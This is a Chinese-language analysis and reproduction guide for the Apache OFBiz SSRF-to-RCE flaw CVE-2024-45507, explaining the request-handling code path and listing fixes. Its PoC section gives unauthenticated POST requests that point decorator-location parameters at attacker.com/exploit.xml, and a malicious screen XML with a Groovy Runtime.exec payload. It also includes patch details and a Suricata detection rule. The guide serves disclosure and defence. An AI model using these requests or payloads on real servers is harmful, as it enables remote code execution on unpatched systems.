Apache OFBiz SSRF to RCE (CVE-2024-45507) 漏洞分析与复现指南<\/h1>

1. 漏洞概述<\/h2>
漏洞名称<\/strong>: Apache OFBiz SSRF to RCE
CVE编号<\/strong>: CVE-2024-45507
影响版本<\/strong>: Apache OFBiz < 18.12.16
漏洞类型<\/strong>: 服务器端请求伪造(SSRF)导致远程代码执行(RCE)
风险等级<\/strong>: 高危
利用条件<\/strong>: 无需认证即可利用<\/p>

2. 环境搭建<\/h2>
复现环境准备<\/h3>

下载受影响版本(以18.12.12为例):<\/li> <\/ol>
wget https:\/\/github.com\/apache\/ofbiz-framework\/archive\/refs\/tags\/release18.12.12.tar.gz <\/span><\/span><\/code><\/pre> 启动OFBiz服务:<\/li> <\/ol> .\/gradlew ofbizDebug <\/span><\/span><\/code><\/pre>3. 漏洞原理分析<\/h2> 漏洞触发流程<\/h3> 请求处理机制<\/strong>:<\/p> OFBiz通过RequestHandler#resolveURI<\/code>处理请求URI<\/li> 将path用"\/"分成两部分，取第二部分作为nextPage<\/code><\/li> 检查requestMapMap<\/code>是否存在requestUri<\/code>和viewMapMap<\/code>是否存在viewUri<\/code><\/li> <\/ul> <\/li> 路由映射<\/strong>:<\/p> 根据rmaps<\/code>配置反射调用相关函数<\/li> 例如login<\/code>路由对应LoginWorker#login<\/code>方法<\/li> 返回值决定后续流程(success<\/code>\/requirePasswordChange<\/code>\/error<\/code>)<\/li> <\/ul> <\/li> 视图渲染机制<\/strong>:<\/p> renderView<\/code>方法通过viewName<\/code>获取XML配置<\/li> 从TempExprScreens.xml<\/code>等配置文件中读取tempExprDecoratorLocation<\/code>参数<\/li> 该参数值被用作location<\/code>值进行后续处理<\/li> <\/ul> <\/li> SSRF到RCE转换<\/strong>:<\/p> DecoratorScreen#renderWidgetString<\/code>调用this.getLocation<\/code>解析模板<\/li> 通过URL参数可控制location<\/code>值<\/li> ScreenFactory.java#getScreenFromLocation<\/code>获取URL内容作为模板解析<\/li> <\/ul> <\/li> <\/ol> 关键调用栈<\/h3> getScreenFromLocation:100, ScreenFactory (org.apache.ofbiz.widget.model) renderReferencedScreen:192, ScreenFactory (org.apache.ofbiz.widget.model) renderWidgetString:876, ModelScreenWidget$DecoratorScreen (org.apache.ofbiz.widget.model) renderSubWidgetsString:103, ModelScreenWidget (org.apache.ofbiz.widget.model) renderWidgetString:285, ModelScreenWidget$Section (org.apache.ofbiz.widget.model) renderScreenString:164, ModelScreen (org.apache.ofbiz.widget.model) render:140, ScreenRenderer (org.apache.ofbiz.widget.renderer) render:102, ScreenRenderer (org.apache.ofbiz.widget.renderer) render:113, MacroScreenViewHandler (org.apache.ofbiz.widget.renderer.macro) renderView:1066, RequestHandler (org.apache.ofbiz.webapp.control) doRequest:741, RequestHandler (org.apache.ofbiz.webapp.control) doGet:212, ControlServlet (org.apache.ofbiz.webapp.control) doPost:85, ControlServlet (org.apache.ofbiz.webapp.control) ... <\/code><\/pre> 4. 漏洞复现<\/h2> 可利用路径<\/h3> 以下路径可在未授权情况下触发漏洞:<\/p> \/webtools\/control\/main\/findTemporalExpression<\/code><\/li> \/webtools\/control\/forgotPassword\/findTemporalExpression<\/code><\/li> \/webtools\/control\/main\/ViewMetrics<\/code><\/li> <\/ul> 漏洞利用PoC<\/h3> 基本利用请求<\/strong>:<\/li> <\/ol> POST<\/span> \/webtools\/control\/main\/findTemporalExpression HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8443<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>tempExprDecoratorLocation=http:\/\/attacker.com\/exploit.xml <\/span><\/span><\/code><\/pre> 替代利用路径<\/strong>:<\/li> <\/ol> POST<\/span> \/webtools\/control\/main\/ViewMetrics HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8443<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>statsDecoratorLocation=http:\/\/attacker.com\/exploit.xml <\/span><\/span><\/code><\/pre> 另一种变体<\/strong>:<\/li> <\/ol> POST<\/span> \/webtools\/control\/forgotPassword\/findTemporalExpression HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8443<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>tempExprDecoratorLocation=http:\/\/attacker.com\/exploit.xml <\/span><\/span><\/code><\/pre>恶意XML构造<\/h3> 参考CommonScreens.xml<\/code>中的Groovy表达式语法，构造如下恶意XML:<\/p> <screen><\/span> <\/span><\/span> <widget><\/span> <\/span><\/span> <set<\/span> field=<\/span>"groovyScript"<\/span>><\/span> <\/span><\/span> <![CDATA[ <\/span><\/span><\/span> ${groovy:Runtime.getRuntime().exec("恶意命令")} <\/span><\/span><\/span> ]]><\/span> <\/span><\/span> <\/set><\/span> <\/span><\/span> <\/widget><\/span> <\/span><\/span><\/screen><\/span> <\/span><\/span><\/code><\/pre>5. 漏洞影响范围<\/h2> 易受攻击的配置文件<\/h3> 在framework\/webtools\/widget<\/code>目录下，包含location="${parameters.<\/code>字符且不为${parameters.mainDecoratorLocation}<\/code>的配置文件均可能受影响，例如:<\/p> TempExprScreens.xml<\/code><\/li> StatsScreens.xml<\/code><\/li> <\/ul> 注意：不同版本可能配置文件有所不同。<\/p> 6. 防护措施<\/h2> 官方补丁<\/h3> 补丁1<\/strong>:<\/p> 提交: 28f5f87ec9<\/li> 内容: 对location<\/code>参数进行严格校验<\/li> 链接: https:\/\/github.com\/apache\/ofbiz-framework\/commit\/28f5f87ec9<\/li> <\/ul> <\/li> 补丁2<\/strong>:<\/p> 提交: 9fe40f8cba8399afdfa41e8c9fd0ec61a569f2b5<\/li> 内容: 对多个路由和方法进行加固鉴权<\/li> <\/ul> <\/li> <\/ol> 升级建议<\/h3> 立即升级到Apache OFBiz 18.12.16或更高版本。<\/p> Suricata IDS规则<\/h3> alert http any any -> any any ( msg:"Apache OFBiz未授权代码执行(CVE-2024-45507&CVE-2024-45195)"; flow:established,to_server; content:"POST";http_method; http.request_body; pcre:"\/(?:\b\w*DecoratorLocation\s*|DATAFILE_LOCATION|DEFINITION_IS_URL|DEFINITION_NAME)=\s*i""; classtype:web-application-attack; sid:2024090502; rev:1; ) <\/code><\/pre> 7. 参考链接<\/h2> Rapid7漏洞分析: https:\/\/www.rapid7.com\/blog\/post\/2024\/09\/05\/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed\/<\/li> OFBiz GitHub仓库: https:\/\/github.com\/apache\/ofbiz-framework<\/li> <\/ol>